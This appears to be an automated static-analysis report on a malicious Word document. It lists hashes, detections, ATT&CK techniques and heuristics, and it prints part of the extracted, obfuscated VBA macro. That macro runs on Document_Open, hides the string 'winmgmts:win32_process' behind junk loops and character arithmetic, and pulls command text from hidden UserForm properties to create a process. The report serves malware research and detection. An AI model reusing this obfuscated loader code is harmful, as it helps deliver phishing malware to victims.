Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6ca36aa44cb22d97…

MALICIOUS

Office (OLE)

178.6 KB Created: 2020-08-21 14:01:00 Authoring application: Microsoft Office Word First seen: 2020-09-15
MD5: d72857f248ea590ddb76c86c3414191f SHA-1: ec65bb43793aae5c3ed64c34e567c7a138b9121b SHA-256: 6ca36aa44cb22d971040268aabf1d45f44ac697b4e08cc646db0e2491a8cf597
262 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

This Office document contains a VBA macro that automatically executes upon opening, as indicated by the 'Document_Open' and 'auto-exec' heuristics. The macro utilizes 'CreateObject' and a hidden UserForm property to act as a command stager, strongly suggesting it's designed to download and execute a secondary payload. The presence of VBA macros and the auto-execution behavior are common in malicious documents delivered via spearphishing attachments.

Heuristics 7

  • ClamAV: Doc.Malware.Generic-9443669-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-9443669-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10295 bytes
SHA-256: 43a6da490b425917587fcaf46a9ef6ee52b4c94d6a009ede2c8692cfadde912f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "K_ffodq71i5j"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Ens00pqyw43j0jv47q.Em2x6xfraxkc_6uo_
End Sub


Attribute VB_Name = "Ens00pqyw43j0jv47q"
Attribute VB_Base = "0{D7E2F9F0-D5B0-42D5-8BDE-EDF08258C766}{87D62EA0-A048-47D8-AFAD-77A8EF6EEA97}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Em2x6xfraxkc_6uo_()
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Sb1fch5e_bxul8 = Ens00pqyw43j0jv47q.BorderStyle + 100
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Cj86icmf5q_tc = ChrW(Sb1fch5e_bxul8 + (15))
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
M0wm7cd4j73c9a = "15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]w15df qhs1g 2[s55da znb183b]i15df qhs1g 2[s55da znb183b]nm15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]gm15df qhs1g 2[s55da znb183b]t15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]" + Cj86icmf5q_tc + "15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]:15df qhs1g 2[s55da znb183b]w15df qhs1g 2[s55da znb183b]in15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]315df qhs1g 2[s55da znb183b]215df qhs1g 2[s55da znb183b]_15df qhs1g 2[s55da znb183b]" + Ens00pqyw43j0jv47q.Tgt42sh_njufatzwn + "15df qhs1g 2[s55da znb183b]ro15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]ce15df qhs1g 2[s55da znb183b]s15df qhs1g 2[s55da znb183b]s15df qhs1g 2[s55da znb183b]"
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
X2sel_gx271me8yqi = Ajxmc0b74u8_7b3ylz(M0wm7cd4j73c9a)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Set K_2spc9h9zq5l = CreateObject(X2sel_gx271me8yqi)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Ivflgrlckeepwjr = Ens00pqyw43j0jv47q.R7yri7_dgf8se5dsq9.ControlTipText
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
... (truncated)